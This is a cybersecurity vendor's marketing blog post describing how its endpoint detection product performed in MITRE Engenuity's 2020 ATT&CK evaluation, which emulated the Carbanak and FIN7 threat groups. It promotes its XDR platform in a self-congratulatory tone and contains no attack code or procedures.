Cloud Security

Fidelis Detects Adversary Tactics & Techniques Early and Often Across All Stages of the Attack Lifecycle in MITRE Engenuity’s 2020 ATT&CK® Evaluation

Author
Ingrid Kambe
Director, Marketing
SHARE:

Fidelis Cybersecurity enables security teams to detect and engage with adversaries earlier in the attack lifecycle using active defense solutions that provide full visibility and response options across endpoints, network and cloud. The MITRE Engenuity 2020 ATT&CK evaluation bears this out in its endpoint evaluation that showed Fidelis Endpoint EDR detected simulated Carbanak and Fin7 cyber crime attacks early and often across all stages of the attack lifecycle, enabling enterprises to stop attacks well before they cause damage.

Fidelis Endpoint detected activity across every attempted adversary tactic and the vast majority of ATT&CK techniques. Out of 20 discrete adversary steps and 174 adversarial sub-steps in the simulated attacks, Fidelis Endpoint EDR detected an indicator a total of 282 times, across all 20 steps, providing extensive coverage across the adversary attack lifecycle. Fidelis Endpoint is one key component of the Fidelis Elevate eXtended Detection and Response (XDR) platform, which helps organizations adopt an active defense posture and engage adversaries earlier in the attack lifecycle. In this MITRE evaluation, Fidelis Endpoint (EDR) achieved strong performance across the board.

Newly Released ATT&CK Evaluations – Carbanak and FIN7

The MITRE ATT&CK framework is a recognized authority on understanding the behaviors of threat actor tactics and techniques based on real-world observations. MITRE regularly conducts product evaluations to provide transparency on the capabilities of security products to defend against known cyber adversary attacks.

MITRE Engenuity ATT&CK evaluations are designed to help organizations systematically assess, test, and tune their defenses by replicating the tactics, techniques, and procedures of threat groups. The 2020 testing emulated real world Enterprise Carbanak and FIN7 threat adversaries.  The financially motivated Carbanak and Fin7 attacks represent the modern threat actors that can affect organizations across many verticals. They utilize innovative tradecraft, stealth, espionage, a wide variety of techniques and utilities to hide in plain sight and fully exploit intended targets. This assessment validates the efficacy of a core component of Fidelis Elevate, an Active XDR platform.

Our ATT&CK Evaluation Journey

Fidelis Cybersecurity continuously stress tests our products to ensure that our customers are armed with the best defense possible. MITRE Engenuity testing provides third-party validation of how Fidelis Endpoint identifies malicious activity in real-world attack scenarios.

What malicious activity did Fidelis see and alert?

Fidelis Endpoint (EDR) detected activity across every attempted adversary tactic and provided visibility and detections in all steps through the evaluation. Fidelis provides enrichment tags to alerts and behavior telemetry to identify the tactic and technique per MITRE ATT&CK framework.

How should you interpret the results?

During the evaluation, 174 attack sub-steps were performed as adversarial actions. Vendors were evaluated based on observed results. First, any detection was noted as an automated alert that produced a tag to identify the tactic or technique used in the step. In many cases, an alert is not a warranted output as the sub-step by itself is not indicative of malicious activity so the captured behavior data (telemetry) is evaluated if the sub-step can be identified by a data search or by tags to identify the tactic or technique. As a result of capturing alert data, telemetry, and tactic and technique tag enrichments, the total number of detections by Fidelis was 282, more than the 174 sub-steps.

It is important to recognize that adversaries have choices in their plan of attack. They do not follow a recipe leading to the same steps used in every campaign. This is why there are many possible steps and sub-steps. To interpret the results, consider these important aspects:

  • Ability to detect every major step and tactic. Fidelis detected 100% of the steps.
  • Concentrate on the early steps in the attack. Your goal is to detect early and respond before the adversary can achieve their mission. Fidelis achieved this goal.
  • Automate response. While response capability was not part of the evaluation, it is vitally important to prevent damage. Fidelis Endpoint can automate an enterprise-wide response based on many factors, including the enrichment tags for tactics and techniques.

What relevant context can Fidelis provide about the activity?

This third ATT&CK evaluation was intended to target a specific threat actor and their techniques used upon initial access into an organization. While important, breach detection is only one part of a security posture; it is equally if not more important to implement controls that prevent breaches (preventive, protective, predictive, deceptive), as well as controls that help alleviate the damage due to breaches (forensics, response, data leakage prevention).

Fidelis Endpoint is a key component of the Fidelis Elevate platform. This Active XDR solution has been purpose-built for active defense strategies. Its focus is on engaging with and defeating adversaries earlier in the attack lifecycle while introducing cost, complexity, and confusion to the adversary. Fidelis Elevate XDR enables SOC analysts to quickly detect and block attacks, perform deep inspection/analysis of the environment to assess whether any systems have been compromised, and return impacted systems to normal business operations as quickly as possible. Fidelis’ Active XDR platform shifts the defense posture from passive alert monitoring to active engagement by combining deception technologies with detection and response for endpoint (EDR), network (NDR), and cloud. Traditional XDR solutions bring together telemetry into yet another data lake. In contrast, Active XDR from Fidelis uses telemetry to enhance SOC efficiency by helping to re-shape the attack surface and giving the SOC team the tools it needs to stop threats before the threats stop business.

How can ATT&CK Evaluations help defenders?

The test is designed to help enterprise analysts make informed decisions about specific use cases by giving them consistent context across vendor products to help evaluate vendors against real-world adversary scenarios. The test results can help assess:

  • Investigations and hunting: The tactic and technique enriched telemetry provides the forensics needed to do a hunt. The analyst should look at what tests were not detected. Specifically, they should see where they lie in the attack life cycle and any alternative coverage or improvements since the test.
  • Detecting advanced threats: The rule engine in the tool that uses the telemetry and the tactic and technique enrichments to provide detections should enable the analyst to create rules as needed for the ever-changing threat landscape. It is also important to know about any such rules and threats coverages from the vendor available out of the box.

MITRE Engenuity’s evaluations are intended to share observations without awarding any scores, rankings or comparison. This creates room for different interpretations and can make results difficult to understand at a glance, since there is no “winner”, just raw data.

Summary

Fidelis Cybersecurity enables security teams to shift left to engage with adversaries earlier in the attack lifecycle using active defense solutions that provide full visibility and response across endpoints, networks, and cloud systems. The ATT&CK Evaluations focus on endpoint analysis capabilities, which is an important part of a security defense, but not the only need. In fact, Fidelis network and deception used in conjunction with Fidelis endpoint provides stronger conviction on attacks and further response options while introducing cost and confusion to adversaries. These additional XDR capabilities were not tested in this evaluation.

The Fidelis Endpoint release tested during the 2020 MITRE Engenuity ATT&CK Evaluations demonstrated exemplary detection capabilities.  Since then, we’ve further enhanced Fidelis Endpoint with version 9.4, which introduces a new and improved detection rule evaluation system. These advancements include the ability to combine and leverage pre-execution YARA binary signature (executable content) and textual (script content) pattern matching rules with behavior metadata to create complex and powerful detection rules. We expanded detection rule actions to allow process blocking along with alerting and enriching behavior data with customizable and searchable classifiers including MITRE technique and tactic identifiers. Utilizing Fidelis Endpoint 9.4 expanded detection rule YARA capability, the MITRE evaluation round three Fidelis Endpoint detections would have been greatly expanded.

Stay tuned for our deep dive including recommended key things to look for to help you make the decision that is right for your organization’s situation, risk profile, needs, and expectations.

 

Browse our blog